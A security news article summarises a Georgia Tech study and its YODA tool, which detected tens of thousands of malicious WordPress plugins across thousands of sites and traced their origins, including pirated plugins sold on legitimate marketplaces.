YODA tool found around 47,000 malicious WordPress plugins installed on over 24,000 sites
As many as 47,337 malicious plugins were discovered on 24,931 unique websites, of which 3,685 plugins were sold on legitimate marketplaces, earning attackers $41,500 in illegal revenue.
The findings come from a new tool called YODA that aims to detect malicious WordPress plugins and trace their origin, according to an 8-year study by a group of researchers from the Georgia Institute of Technology.
“Attackers posed as benign plugin authors and spread malware by distributing pirated plugins,” the researchers said in a new paper titled “Beware of Plugins You Need.”
“The number of malicious plugins on websites has steadily increased over the years, and malicious activity peaked in March 2020. Amazingly, 94% of malicious plugins installed over those 8 years are still active today.”
The large-scale research analyzed WordPress plugins installed on 410,122 unique web servers dating back to 2012, finding that plugins that cost a total of $834,000 were infected post-deployment by threat actors.
YODA can be integrated directly into a website and web server hosting provider, or deployed through a plug-in marketplace. In addition to detecting hidden and faked malware add-ons, the framework can also be used to identify a plugin’s provenance and ownership.
It does this by scanning server-side code files and associated metadata (e.g., comments) to detect plugins, and then performs syntactic and semantic analysis to flag malicious behavior.
The semantic model represents a wide range of red flags, including web shell, insert new message function, password-protected execution of injected code, spam, code obfuscation, blocking of SEO, downloading malware, malvertisement and cryptocurrency miners.
Some of the remarkable findings are as follows –
- 3,452 plugins available on legit plugin marketplaces made it easy to inject spam
- 40,533 plugins infected after deployment to 18,034 websites
- Null plugins – WordPress plugins or themes that have been tampered with to upload malicious code to servers – accounted for 8,525 of the total malicious add-ons, with around 75% of pirated plugins tricking developers out of $228,000 in revenue
“By using YODA, website owners and hosting providers can identify malicious plugins on the web server; plugin developers and marketplaces can check their plugins before distribution,” the researchers pointed out.